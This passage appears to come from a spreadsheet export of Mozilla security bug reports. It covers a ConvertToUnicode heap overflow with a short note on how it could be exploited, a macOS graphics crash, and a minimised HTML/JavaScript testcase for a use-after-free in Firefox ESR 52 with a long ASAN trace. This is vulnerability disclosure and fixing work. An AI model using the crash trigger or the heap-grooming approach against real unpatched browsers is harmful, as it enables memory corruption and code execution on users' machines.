./devtools/client/debugger/content/views/sources-view.js:307:      unicodeUrl = NetworkHelper.convertToUnicode(unescape(fullUrl));
./devtools/client/debugger/content/views/sources-view.js:638:    return NetworkHelper.convertToUnicode(unescape(source.url));
./devtools/client/debugger/utils.js:149:    let unicodeLabel = NetworkHelper.convertToUnicode(unescape(sourceLabel));
./devtools/client/debugger/utils.js:185:    let unicodeLabel = NetworkHelper.convertToUnicode(unescape(groupLabel));
./devtools/client/netmonitor/netmonitor-view.js:556:      let unicodeUrl = NetworkHelper.convertToUnicode(unescape(data.url));
./devtools/client/netmonitor/request-utils.js:136:  let name = NetworkHelper.convertToUnicode(
./devtools/client/netmonitor/request-utils.js:138:  let query = NetworkHelper.convertToUnicode(unescape(url.query));
./devtools/client/netmonitor/request-utils.js:147:  return NetworkHelper.convertToUnicode(unescape(url.hostPort));
./devtools/client/netmonitor/requests-menu-view.js:970:        let unicodeUrl = NetworkHelper.convertToUnicode(unescape(uri.spec));
./devtools/client/netmonitor/test/head.js:264:  let unicodeUrl = NetworkHelper.convertToUnicode(unescape(aUrl));
./devtools/client/netmonitor/test/head.js:265:  let name = NetworkHelper.convertToUnicode(unescape(uri.fileName || uri.filePath || "/"));
./devtools/client/netmonitor/test/head.js:266:  let query = NetworkHelper.convertToUnicode(unescape(uri.query));
./devtools/client/scratchpad/scratchpad.js:1126:          content = converter.ConvertToUnicode(aContent);
./devtools/server/actors/settings.js:35:  let rawstr = converter.ConvertToUnicode(NetUtil.readInputStreamToString(
./devtools/shared/DevToolsUtils.js:472:      // the guess is wrong, the conversion fails and convertToUnicode returns
./devtools/shared/DevToolsUtils.js:477:      let unicodeSource = NetworkHelper.convertToUnicode(source, charset);
./devtools/shared/transport/packets.js:165:    json = unicodeConverter.ConvertToUnicode(json);
./devtools/shared/webconsole/network-helper.js:87:  convertToUnicode: function (text, charset) {
./devtools/shared/webconsole/network-helper.js:92:      return conv.ConvertToUnicode(text);
./devtools/shared/webconsole/network-helper.js:110:      return this.convertToUnicode(text, charset);
./devtools/shared/webconsole/network-helper.js:789:          NetworkHelper.convertToUnicode(unescape(param[0])) : "",
./devtools/shared/webconsole/network-helper.js:791:          NetworkHelper.convertToUnicode(unescape(param[1])) : ""
./devtools/shared/webconsole/network-monitor.js:411:        NetworkHelper.convertToUnicode(data, request.contentCharset);
./dom/apps/AppsUtils.jsm:657:          let data = JSON.parse(converter.ConvertToUnicode(NetUtil.readInputStreamToString(aStream,
./dom/settings/SettingsDB.jsm:91:    let rawstr = converter.ConvertToUnicode(NetUtil.readInputStreamToString(
./services/common/utils.js:196:      str = this._utf8Converter.ConvertToUnicode(str);
./toolkit/components/passwordmgr/crypto-SDR.js:130:      plainText = this._utfConverter.ConvertToUnicode(plainOctet);
./toolkit/components/telemetry/tests/unit/head.js:144:    let utf8string = unicodeConverter.ConvertToUnicode(observer.buffer);
./toolkit/identity/tests/unit/test_crypto_service.js:107:    let result = utf8Converter.ConvertToUnicode(base64UrlDecode(target));
nsScriptableUnicodeConverter::ConvertFromByteArray:
./toolkit/components/places/BookmarkJSONUtils.jsm:203:            let jsonString = converter.convertFromByteArray(aResult,
./toolkit/components/places/BookmarkJSONUtils.jsm:240:      let jsonString = converter.convertFromByteArray(aResult, aResult.length);
./toolkit/components/places/tests/bookmarks/test_1016953-renaming-uncompressed.js:38:  let jsonString = converter.convertFromByteArray(result, result.length);
./toolkit/components/places/tests/bookmarks/test_1016953-renaming-uncompressed.js:68:  let jsonString = converter.convertFromByteArray(result, result.length);
For example, BookmarkJSONUtils.jsm calls convertFromByteArray while importing bookmarks, with the data obtained from either a compressed file or an URL, which can be provided by an attacker.
III. Exploitability
With an arbitrary heap overflow and some prior heap grooming, it's possible to overwrite metadata of some object (a storage slot of an Array, for example) and thereby obtain an arbitrary read-write exploitation primitive, which can be leveraged into both an info-leak and arbitrary code execution.
The bug was confirmed with the latest release source code of Firefox ESR.
Actual results:
code review</t>
        </is>
      </c>
      <c r="X642" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="643">
      <c r="A643" t="n">
        <v>1135066</v>
      </c>
      <c r="B643" t="inlineStr">
        <is>
          <t>2015-02-20 07:25:06 -0800</t>
        </is>
      </c>
      <c r="C643" t="inlineStr">
        <is>
          <t>SEGV in mozilla::layers::BufferTextureClient::AllocateForSurface</t>
        </is>
      </c>
      <c r="D643" t="inlineStr">
        <is>
          <t>2016-07-02 10:34:34 -0700</t>
        </is>
      </c>
      <c r="E643" t="n">
        <v>1</v>
      </c>
      <c r="F643" t="n">
        <v>1</v>
      </c>
      <c r="G643" t="n">
        <v>3</v>
      </c>
      <c r="H643" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I643" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J643" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K643" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L643" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M643" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N643" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O643" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P643" t="inlineStr">
        <is>
          <t>[adv-main38+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q643" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R643" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S643" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T643" t="n">
        <v>1</v>
      </c>
      <c r="U643" t="n">
        <v>0</v>
      </c>
      <c r="V643" t="n">
        <v>16</v>
      </c>
      <c r="W643" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1095925 +++
The test case from bug 1095925 crashes OS X with a different signature.</t>
        </is>
      </c>
      <c r="X643" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="644">
      <c r="A644" t="n">
        <v>1399400</v>
      </c>
      <c r="B644" t="inlineStr">
        <is>
          <t>2017-09-13 03:10:10 -0700</t>
        </is>
      </c>
      <c r="C644" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsGenericHTMLElement::GetFormControlFrame</t>
        </is>
      </c>
      <c r="D644" t="inlineStr">
        <is>
          <t>2024-05-30 09:36:44 -0700</t>
        </is>
      </c>
      <c r="E644" t="n">
        <v>1</v>
      </c>
      <c r="F644" t="n">
        <v>1</v>
      </c>
      <c r="G644" t="n">
        <v>3</v>
      </c>
      <c r="H644" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I644" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J644" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K644" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L644" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M644" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N644" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O644" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P644" t="inlineStr">
        <is>
          <t>[fixwindow-wanted][adv-main58+][adv-esr52.6+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q644" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R644" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S644" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T644" t="n">
        <v>1</v>
      </c>
      <c r="U644" t="n">
        <v>0</v>
      </c>
      <c r="V644" t="n">
        <v>46</v>
      </c>
      <c r="W644" t="inlineStr">
        <is>
          <t>Created attachment 8907491
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox ESR 52.3.1 (BuildID=20170912172710). It requires the fuzzPriv extension to trigger reliably.
&lt;script&gt;
function start() {
	o0=document.createElement('iframe');
	document.body.appendChild(o0);
	o1=window.open('data:text/html,&lt;div&gt;&lt;div&gt;&lt;div&gt;','popup35','height=134');
	o1.onload=fun0;
}
function fun0(e) {
	o5=e.target;
	o1.onresize=fun2;
	tmp=o5.getElementsByTagName('*');;
	o6=tmp[0];
	o7=tmp[1];
	o8=tmp[3];
	o15=document.createElement('input');
	o20=document.createElement('marquee');
	o20.addEventListener('DOMAttrModified',fun1);
	o8.appendChild(o20);
	o7.replaceWith(o15);
}
function fun1() {
	o15.type='number';
	o1.resizeTo(57,100);
	o5.removeChild(o6);
	o5.appendChild(o6);
	o15.select();
}
function fun2() {
	window.top.document.documentElement.appendChild(o15);
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==29513==ERROR: AddressSanitizer: heap-use-after-free on address 0x6150005339b0 at pc 0x7f51ef4b0479 bp 0x7ffdbbad88e0 sp 0x7ffdbbad88d8
READ of size 4 at 0x6150005339b0 thread T0
    #0 0x7f51ef4b0478 in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1630:12
    #1 0x7f51ef4b0478 in IsInUncomposedDoc /home/worker/workspace/build/src/dom/base/nsINode.h:526
    #2 0x7f51ef4b0478 in GetPrimaryFrame /home/worker/workspace/build/src/obj-firefox/dist/include/nsIContent.h:916
    #3 0x7f51ef4b0478 in GetPrimaryFrame /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:964
    #4 0x7f51ef4b0478 in nsGenericHTMLElement::GetFormControlFrame(bool) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:1005
    #5 0x7f51ef3566ba in SelectAll /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3766:43
    #6 0x7f51ef3566ba in mozilla::dom::HTMLInputElement::Select() /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3724
    #7 0x7f51ef3563b7 in mozilla::dom::HTMLInputElement::Select() /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3688:14
    #8 0x7f51eea54770 in mozilla::dom::HTMLInputElementBinding::select(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLInputElement*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLInputElementBinding.cpp:2769:3
    #9 0x7f51eed10399 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
    #10 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #11 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #12 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #13 0x7f51f4e043ac in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #14 0x7f51f4dd39df in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #15 0x7f51f4de14cf in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #16 0x7f51f4de3c7e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #17 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #18 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #19 0x7f51f507548f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #20 0x7f51f507548f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #21 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #22 0x7f51f50956ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #23 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #24 0x7f51f4b66b8d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #25 0x7f51ee6fcd6c in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #26 0x7f51ef0f43e2 in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:64:12
    #27 0x7f51ef0f43e2 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1130
    #28 0x7f51ef0f5e57 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
    #29 0x7f51ef0e0e79 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:401:9
    #30 0x7f51ef0e4248 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #31 0x7f51ef0e6147 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:780:12
    #32 0x7f51ed2d18f1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1309:5
    #33 0x7f51ef07eb16 in mozilla::AsyncEventDispatcher::Run() /home/worker/workspace/build/src/dom/events/AsyncEventDispatcher.cpp:54:3
    #34 0x7f51ecdd918e in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5195:5
    #35 0x7f51ed1d4cf4 in nsDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:4795:3
    #36 0x7f51ef4eff8c in nsHTMLDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2424:3
    #37 0x7f51f0eab795 in ~mozAutoDocConditionalContentUpdateBatch /home/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:83:7
    #38 0x7f51f0eab795 in nsDOMCSSDeclaration::ParsePropertyValue(nsCSSPropertyID, nsAString_internal const&amp;, bool) /home/worker/workspace/build/src/layout/style/nsDOMCSSDeclaration.cpp:319
    #39 0x7f51ed6b157b in SetMargin /home/worker/workspace/build/src/layout/style/nsCSSPropList.h:2474:1
    #40 0x7f51ed6b157b in mozilla::dom::CSS2PropertiesBinding::set_margin(JSContext*, JS::Handle&lt;JSObject*&gt;, nsDOMCSSDeclaration*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:24459
    #41 0x7f51eed0f75c in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2865:8
    #42 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #43 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #44 0x7f51f5096dc8 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #45 0x7f51f5096dc8 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:650
    #46 0x7f51f50fc26d in SetExistingProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2434:10
    #47 0x7f51f50fc26d in js::NativeSetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::QualifiedBool, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2469
    #48 0x7f51f4dad9a8 in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1540:12
    #49 0x7f51f4dad9a8 in js::SetPropertyIgnoringNamedGetter(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::PropertyDescriptor&gt;, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/proxy/BaseProxyHandler.cpp:182
    #50 0x7f51eed1a985 in mozilla::dom::DOMProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) const /home/worker/workspace/build/src/dom/bindings/DOMJSProxyHandler.cpp:258:10
    #51 0x7f51f4ddfc31 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:333:12
    #52 0x7f51f4cbdb9a in JSObject::nonNativeSetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/jsobj.cpp:1022:12
    #53 0x7f51f506e16f in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1539:16
    #54 0x7f51f506e16f in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:259
    #55 0x7f51f506e16f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2715
    #56 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #57 0x7f51f50956ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #58 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #59 0x7f51f4b64922 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #60 0x7f51f058736b in Call /home/worker/workspace/build/src/obj-firefox/dist/include/jsapi.h:3310:14
    #61 0x7f51f058736b in nsXBLProtoImplAnonymousMethod::Execute(nsIContent*, JSAddonId*) /home/worker/workspace/build/src/dom/xbl/nsXBLProtoImplMethod.cpp:331
    #62 0x7f51f0550f1e in nsXBLBinding::ExecuteAttachedHandler() /home/worker/workspace/build/src/dom/xbl/nsXBLBinding.cpp:634:5
    #63 0x7f51f0550d1e in nsBindingManager::ProcessAttachedQueueInternal(unsigned int) /home/worker/workspace/build/src/dom/xbl/nsBindingManager.cpp:419:7
    #64 0x7f51f137ce69 in ProcessAttachedQueue /home/worker/workspace/build/src/dom/xbl/nsBindingManager.h:105:5
    #65 0x7f51f137ce69 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4175
    #66 0x7f51f108e9dc in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1836:11
    #67 0x7f51f109b221 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:295:7
    #68 0x7f51f109acb5 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:316:5
    #69 0x7f51f109d7de in applyImpl&lt;mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), StoreCopyPassByValue&lt;mozilla::TimeStamp&gt; , 0&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:775:12
    #70 0x7f51f109d7de in apply&lt;mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp)&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:781
    #71 0x7f51f109d7de in mozilla::detail::RunnableMethodImpl&lt;void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), true, false, mozilla::TimeStamp&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:810
    #72 0x7f51ea58149b in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #73 0x7f51ea6035dc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #74 0x7f51eb3bc25f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #75 0x7f51eb32ddb8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #76 0x7f51eb32ddb8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #77 0x7f51eb32ddb8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #78 0x7f51f09c29af in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #79 0x7f51f2a3ff71 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #80 0x7f51f2bd7287 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
    #81 0x7f51f2bd89fd in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
    #82 0x7f51f2bd98bc in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
    #83 0x4df91a in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
    #84 0x4df91a in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
    #85 0x7f5205fca82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #86 0x41ba88 in _start (/fuzzer3/esr/firefox/firefox+0x41ba88)
0x6150005339b0 is located 48 bytes inside of 496-byte region [0x615000533980,0x615000533b70)
freed by thread T0 here:
    #0 0x4b21db in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f51ea449f34 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2665:9
    #2 0x7f51ea449b26 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2840:3
    #3 0x7f51ea450bfe in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3826:3
    #4 0x7f51ea4500bc in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3651:9
    #5 0x7f51ea454136 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4144:3
    #6 0x7f51ed2ed6c9 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1440:3
    #7 0x7f51ece173bd in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1340:3
    #8 0x7f51ea5a9aa6 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_x86_64_unix.cpp:180:23
    #9 0x7f51ebdcec1e in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2058:12
    #10 0x7f51ebdcec1e in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1377
    #11 0x7f51ebdcec1e in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1344
    #12 0x7f51ebdd62a8 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1000:12
    #13 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #14 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #15 0x7f51f507548f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #16 0x7f51f507548f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #17 0x7f51f505a64d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #18 0x7f51f50956ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #19 0x7f51f5095d32 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #20 0x7f51f4b64922 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #21 0x7f51ebcf65cf in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7f51f5095085 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #23 0x7f51f5095085 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #24 0x7f51f507548f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
